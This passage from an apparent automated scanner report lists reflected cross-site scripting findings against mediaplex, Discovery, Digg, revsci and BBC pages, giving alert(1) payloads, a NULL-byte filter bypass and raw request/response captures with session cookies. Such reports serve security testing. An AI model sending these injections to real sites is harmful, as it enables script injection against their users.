Referer: http://news.bbc.co.uk/weather/forecast/8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo3=14960:16817/9966:1105

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=13001:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 6:16:59 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 544
Date: Thu, 16 Dec 2010 20:01:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/u;230234298;0-0;0;32918551;62-120/240;36239235/36257113/1;;~okv=;slot=button;sz=120x240;sectn=news;ctype=conten
...[SNIP]...
ast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=nonbbc;referrer_domain=burp;rsi=J08781_10139;~sscs=?http://altfarm.mediaplex.com/ad/ck/13001-83639-22765-2?mpt=1479889e228f'-alert(1)-'f5aa47bea46">
...[SNIP]...

2.13. http://altfarm.mediaplex.com/ad/js/13001-83639-22765-2 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13001-83639-22765-2

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2917'%3balert(1)//b7478cd42a was submitted in the mpvc parameter. This input was echoed as b2917';alert(1)//b7478cd42a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13001-83639-22765-2?mpt=1479889&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/u%3B230234298%3B0-0%3B0%3B32918551%3B62-120/240%3B36239235/36257113/1%3B%3B%7Eokv%3D%3Bslot%3Dbutton%3Bsz%3D120x240%3Bsectn%3Dnews%3Bctype%3Dcontent%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dnonbbc%3Breferrer_domain%3Dburp%3Brsi%3DJ08781_10139%3B%7Esscs%3D%3fb2917'%3balert(1)//b7478cd42a HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/forecast/8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo3=14960:16817/9966:1105

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=13001:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 6:37:00 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 549
Date: Thu, 16 Dec 2010 20:01:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/u;230234298;0-0;0;32918551;62-120/240;36239235/36257113/1;;~okv=;slot=button;sz=120x240;sectn=news;ctype=content;weather=forcast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=nonbbc;referrer_domain=burp;rsi=J08781_10139;~sscs=?b2917';alert(1)//b7478cd42ahttp://altfarm.mediaplex.com/ad/ck/13001-83639-22765-2?mpt=1479889">
...[SNIP]...

2.14. http://altfarm.mediaplex.com/ad/js/13001-83639-22765-2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13001-83639-22765-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe51d'-alert(1)-'2a99d47446f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13001-83639-22765-2?fe51d'-alert(1)-'2a99d47446f=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=13001:22765/16775:22765/12760:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:26:57 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 227
Date: Thu, 16 Dec 2010 19:51:18 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/13001-83639-22765-2?fe51d'-alert(1)-'2a99d47446f=1"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/13001/83639/120x
...[SNIP]...

2.15. http://altfarm.mediaplex.com/ad/js/16775-116345-22765-0 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/16775-116345-22765-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c90f'-alert(1)-'4734fe956e3 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/16775-116345-22765-0?mpt=22744833c90f'-alert(1)-'4734fe956e3&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/a%3B232764225%3B0-0%3B0%3B32918551%3B62-120/240%3B39420376/39438163/1%3B%3B%7Eokv%3D%3Bslot%3Dbutton%3Bsz%3D120x240%3Bsectn%3Dnews%3Bctype%3Dcontent%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dnonbbc%3Breferrer_domain%3D%3Brsi%3DJ08781_10139%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/forecast/8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo3=10105:22765/13001:22765/14960:16817/9966:1105

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=16775:22765/10105:22765/13001:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 6:22:00 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 546
Date: Thu, 16 Dec 2010 20:01:21 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/a;232764225;0-0;0;32918551;62-120/240;39420376/39438163/1;;~okv=;slot=button;sz=120x240;sectn=news;ctype=conten
...[SNIP]...
orcast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=nonbbc;referrer_domain=;rsi=J08781_10139;~sscs=?http://altfarm.mediaplex.com/ad/ck/16775-116345-22765-0?mpt=22744833c90f'-alert(1)-'4734fe956e3">
...[SNIP]...

2.16. http://altfarm.mediaplex.com/ad/js/16775-116345-22765-0 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/16775-116345-22765-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96886'%3balert(1)//d268d2fbd20 was submitted in the mpvc parameter. This input was echoed as 96886';alert(1)//d268d2fbd20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/16775-116345-22765-0?mpt=2274483&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/a%3B232764225%3B0-0%3B0%3B32918551%3B62-120/240%3B39420376/39438163/1%3B%3B%7Eokv%3D%3Bslot%3Dbutton%3Bsz%3D120x240%3Bsectn%3Dnews%3Bctype%3Dcontent%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dnonbbc%3Breferrer_domain%3D%3Brsi%3DJ08781_10139%3B%7Esscs%3D%3f96886'%3balert(1)//d268d2fbd20 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/forecast/8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo3=10105:22765/13001:22765/14960:16817/9966:1105

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=16775:22765/10105:22765/13001:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:46:56 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 546
Date: Thu, 16 Dec 2010 20:01:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/a;232764225;0-0;0;32918551;62-120/240;39420376/39438163/1;;~okv=;slot=button;sz=120x240;sectn=news;ctype=content;weather=forcast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=nonbbc;referrer_domain=;rsi=J08781_10139;~sscs=?96886';alert(1)//d268d2fbd20http://altfarm.mediaplex.com/ad/ck/16775-116345-22765-0?mpt=2274483">
...[SNIP]...

2.17. http://altfarm.mediaplex.com/ad/js/16775-116345-22765-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/16775-116345-22765-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0f34'-alert(1)-'4f5c619851b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/16775-116345-22765-0?f0f34'-alert(1)-'4f5c619851b=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 233
Date: Thu, 16 Dec 2010 19:51:20 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/16775-116345-22765-0?f0f34'-alert(1)-'4f5c619851b=1"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/16775/116345/12
...[SNIP]...

2.18. http://animal.discovery.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://animal.discovery.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8919"><script>alert(1)</script>c03cf92d4e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8919"><script>alert(1)</script>c03cf92d4e3=1 HTTP/1.1
Host: animal.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 106671
Content-Type: text/html
Cache-Control: max-age=895
Date: Thu, 16 Dec 2010 19:34:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://omnikool.discovery.com/RealMedia/ads/adstream_mjx.ads/animal.discovery.com/index.html/1883928209@x21,TopLeft,x25?rsi=not&d8919"><script>alert(1)</script>c03cf92d4e3=1">
...[SNIP]...

2.19. http://animal.discovery.com/videos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://animal.discovery.com
Path:   /videos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 736d6--><script>alert(1)</script>44083d244bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videos/?736d6--><script>alert(1)</script>44083d244bd=1 HTTP/1.1
Host: animal.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=D08734_70033|D08734_72009|D08734_72076|D08734_72080|D08734_72081; s_cc=true; s_vi=[CS]v1|2685353F851616BF-400001784017009B[CE]; s_sq=%5B%5BB%5D%5D; OAX=zAL5FU0Kan8AA977; __qca=P0-729623038-1292528256407; DIT-HISTORY-TRACKING=channel@animal.discovery.com/%7Cpagename@animal.discovery.com/index.html%7Cmodule@%7Cposition@%7Cassetname@;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 113917
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660;path=/
X-ServerId: 192.168.32.202
Content-Language: en-US
Expires: Thu, 16 Dec 2010 20:38:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Dec 2010 20:38:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>

<meta http-equ
...[SNIP]...
<!-- sx call src = omnikool/sx/animal.discovery.com/videos/index.html/1473552155@x24,TopLeft,x25,x12!x24?rsi=D08734_70033&rsi=D08734_72009&rsi=D08734_72076&rsi=D08734_72080&rsi=D08734_72081&736d6--><script>alert(1)</script>44083d244bd=1 -->
...[SNIP]...

2.20. http://digg.com/remote-submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0060045"><script>alert(1)</script>a4698803c94 was submitted in the REST URL parameter 1. This input was echoed as 60045"><script>alert(1)</script>a4698803c94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /remote-submit%0060045"><script>alert(1)</script>a4698803c94 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 19:34:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Sat, 15-Jan-2011 19:34:02 GMT; path=/; domain=digg.com
Set-Cookie: d=8d44ed5f5f584912e95fbe194c1051b80c69ca7319692a40858cdb18fac60acb; expires=Wed, 16-Dec-2020 05:41:42 GMT; path=/; domain=.digg.com
X-Digg-Time: D=477395 10.2.129.145
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15320

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%0060045"><script>alert(1)</script>a4698803c94.rss">
...[SNIP]...

2.21. http://dsc.discovery.com/tv/storm-chasers/production-crew-q-and-a.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dsc.discovery.com
Path:   /tv/storm-chasers/production-crew-q-and-a.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24525"><script>alert(1)</script>a576fd62842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tv/storm-chasers/production-crew-q-and-a.html?24525"><script>alert(1)</script>a576fd62842=1 HTTP/1.1
Host: dsc.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 61009
Content-Type: text/html
Expires: Thu, 16 Dec 2010 19:51:55 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 16 Dec 2010 19:51:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
::::: languages ....................... [ css (ii), javascript (1.+), rss
...[SNIP]...
pt type="text/javascript" src="http://omnikool.discovery.com/RealMedia/ads/adstream_mjx.ads/dsc.discovery.com/tv/storm-chasers/production-crew-q-and-a.html/23781347@x21,x24,x03,TopLeft,x25,x12?rsi=not&24525"><script>alert(1)</script>a576fd62842=1">
...[SNIP]...

2.22. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e6475<script>alert(1)</script>4547a74f1e was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J08781e6475<script>alert(1)</script>4547a74f1e HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bbc.co.uk/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TQeMjxEBEwoAAB9tEi4AAACB; udm_0=MLvv7lHuIS5n5S4sU8S4wMtr4pJpaPP52bY6V6UjBrzoPH4D0GQp3fv4I0PMo/8TkpA+q5p0G3K1GtFz0HuhpCHe3W0oQSRKdgqUT8+i34bQm/vlBJirv0dWFVsQT0kfMxF4iSQXnuIDjOexweeOifGY70ZZDZKPn/p7hXUpCWFRkhlb023UkcHck0i5XIwWSl6HQt+TzYkClInm4XLsEVoDuzVGE0OE7GaXzsnl+P0bFF0i+LoFZSC8XQ9hAkn1YMuk6+7erRu9jrqS8EWjQr46+NZbsSrJUCkxw4kNEj6qHreEkcAt0Kvz5mrvexzg9L7RbSmH5s8fA+A8Tg0cOljmGZqay94Qp44wWXhYDZgvZeecGg2U09C1hmm5add7VtdrnAsTpH3QoyRyfSxeb+qv7JZU+H9oXHe9Em45+yuA+riByFAbDuE+HvVRwseBYX4PEQORl9yloEdYn8jbEgBkwdQU7sfw1oT1PwLjHLdoNejsDMzMIWVzSWu0mwHhBnIyTNMeEPShpNPCZFqphpQaTuf21nhUFw+r5WrI5ZHbsSfjCafK; rsi_segs_1000000=pUPFJ8/CLnIMlp94t6v7mL4LeFJ8CeYbHGdKBUl6DBDe+3tkT34dgQkSus6vHdHGyYDNs2vpIYygM7KN8jMLPVLbvpMAd+Uk9803l7YGO89pGThoF46X4I1I+RqC2jg0oI6YGKCc7dFNgxuBsyP6EsXP+We1Pdcq9oGjvmh5smcwD7a8QbBPRhTBchX4oFwCD3mseIAR7VgWFgb4ntgz55xdExM0JvN2e5hNcj7uO5b1S95elRydaC0/IXnz8n0bHEuZHA==; NETSEGS_D10889=e67d1d842a10639a&D10889&0&4d2c87d6&0&&4d06fe9a&d9c3afa65117f289d36c2e9c61037522; rtc_0=MLuBW6Wht4kRQAAcCQK3olGe3OpxX+eSMmtTUhquHKb7N+gbhcVe5SeqeV+mXRoYyAFMgjARpSrh/QNlLKvobTunWTUj9pWddPtTGVblnoYSO7xz2P/zTScFyMCPLUuwXEdRRjEwcoJwPLbwqS2+HB14LeG6rRGlWwEw1JN5Psd9WsLdaiNh8FZlu//J6Pal1mRlrmIhuCAvPGkYUwchbTWdebLmKl1Tc91BAIs=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 16 Dec 2010 19:26:59 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 17 Dec 2010 19:26:59 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Thu, 16 Dec 2010 19:26:59 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "J08781E6475<SCRIPT>ALERT(1)</SCRIPT>4547A74F1E" was not recognized.
*/

2.23. http://news.bbc.co.uk/2/hi/programmes/world_news_america/9283905.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/9283905.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 697e2'-alert(1)-'75b4bf66eb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/9283905.stm?697e2'-alert(1)-'75b4bf66eb4=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:34:56 GMT
Keep-Alive: timeout=10, max=597
Expires: Thu, 16 Dec 2010 19:34:56 GMT
Connection: close
Set-Cookie: BBC-UID=04fd408a1679eec06eb712ed11c5c2bba1de5a51b0504149fb7b924a164c74a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04fd408a1679eec06eb712ed11c5c2bba1de5a51b0504149fb7b924a164c74a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 39602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528096000,
       editionToServe: 'international',
       queryString: '697e2'-alert(1)-'75b4bf66eb4=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9283905',
       assetType: null,
   
...[SNIP]...

2.24. http://news.bbc.co.uk/2/hi/programmes/world_news_america/9283924.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/9283924.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203d9'-alert(1)-'d1cb4a5a003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/9283924.stm?203d9'-alert(1)-'d1cb4a5a003=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:34:55 GMT
Keep-Alive: timeout=10, max=651
Expires: Thu, 16 Dec 2010 19:34:55 GMT
Connection: close
Set-Cookie: BBC-UID=544d701a9639bdff5e8702dab13ab447361a1c339020b1a96b3b42baa66c84660Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=544d701a9639bdff5e8702dab13ab447361a1c339020b1a96b3b42baa66c84660Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 39191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528095000,
       editionToServe: 'international',
       queryString: '203d9'-alert(1)-'d1cb4a5a003=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9283924',
       assetType: null,
   
...[SNIP]...

2.25. http://news.bbc.co.uk/2/hi/programmes/world_news_america/9291805.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/9291805.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f10c6'-alert(1)-'8a29b8fd6c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

